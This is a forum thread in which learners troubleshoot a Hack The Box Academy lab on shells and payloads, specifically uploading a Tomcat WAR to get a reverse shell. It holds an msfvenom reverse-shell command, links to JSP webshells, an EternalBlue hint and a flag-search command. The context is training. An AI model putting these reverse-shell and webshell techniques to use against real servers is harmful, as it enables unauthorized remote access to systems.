your welcome bro
[Academy hack the box][Shells & Payloads][The Live Engagement][Lightweight facebook-styled blog 1.3]
Hey Everyone,
I am desperately trying to get the Tomcat war file upload going.
i already messaged with 2 members and got useful insight but still no shell
so i break it down again
I know that it is a windows system and tomcat is java
i got the tomcat credentials and log in
i use msfvenom -p java/jsp_shell_reverse_tcp with LHOST=my_IP LPORT=4444 -f war -o shell.war
i start a listener netcat or msfconsole exploit/multi/handler
i upload the payload and click on it in the browser
nothing happens.
i tried other payloads as well but then tomcat throws errors
i even wrote my own jsp to print Hello HTB with guidance from this link
HTB{ Jerry } (epi052.gitlab.io)
but nothing ā¦
i thought that maybe i need to put the address 172.16.1.11:8080/shell in the /etc/hosts but no
i followed this video Exploiting Apache Tomcat - YouTube
no luck
I tried to troubleshoot the payload like in this link
eighty-two - Why an MsfVenom WAR payload might return a 404 (eightytwo.net)
no
What am i missing ?
I solved it manually, without Metasploit.
Here you can download a webshell
https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
Then put the file into a war file.
The hosts file is there to translate domain names into IP addresses.
Entering an IP address without a domain name makes no sense
are you sure your inputting the correct IP? there should be a few listed, from what you wrote it looks like your doing it correctly to me.
Also just to make sure, you are using the parrot box that you connect to via no machine to setup the listener, correct?
Hey! Thank you for your reply !
I will definitly try this payload, i only thought, this Academy modul introduced metasploit and the videos and articles i read used it (with succsess )
but i will give it a try
thanks for the host file insight !
Hi,
I got the same error message when using the exploit.
Can you help me out, please?
Hey, Would you mind helping me please, i have been stuck on this for long time now, tried too many different thing but nothing is working, your help will be much appreciated.
Hello How do you get to use it on metasploit?! I get an error when I type updatedb after I copied into the msf4 folder
How do you get it working in your msfconsole?! My msfconsole can`t find that exploit after I have done all the mkdir/updatedb process
Some problem about Host-02 (Blog) that I would like to ask:
Do you use browser āLinks 2ā which is installed on the foothold machine to browse the page http://blog.inlanefreight.local:80? Links 2 is to slow for browsing the page and it canāt show some element on the page (eg: login button). Do you have another way to browse the page ? Thank you.
Hi the same problem has already broken a my head can you please tell me what Iām doing wrong
You ever figure this out? I also canāt figure out how people are browsing to these machines on port 8080 or 80 without firefox on the foothold PC.
Hey mate,
create a war file and replace the jsp file with the web shell payload in the given link.
https://raw.githubusercontent.com/tennc/webshell/master/jsp/jsp-reverse.jsp
Hope this helps
Happy Hacking
Hey anyone can expalin how to get the host3 file, I got a shell but unable to fetch the flag, it is asking for administrator privileges
You can use msfconsole and check if it`s vulnerable for ethernal blue!
solved it already mate, thanks.
can someone help me with finding the flag on the blog.inlanefreight.local one. I can get a shell through the msfconsole. Do I then have to drop into a system shell? I canāt get it to be interactive.
in either meterpreter or the system shell, i canāt find the /customscripts/flag.txt for the life of meā¦any pointers?
okay, i figured it out. I donāt know why couldnāt find the location of the /customscripts folder. I ended up searching for it using
find / -type f -name flag.txt 2>/dev/null
and then piping the results to cat by setting the find as an env variable.
> cat $(find / -type f -name flag.txt 2>/dev/null
why there is no browser on my foothold machine ?
You can use BurpSuiteās browser, thatās what I did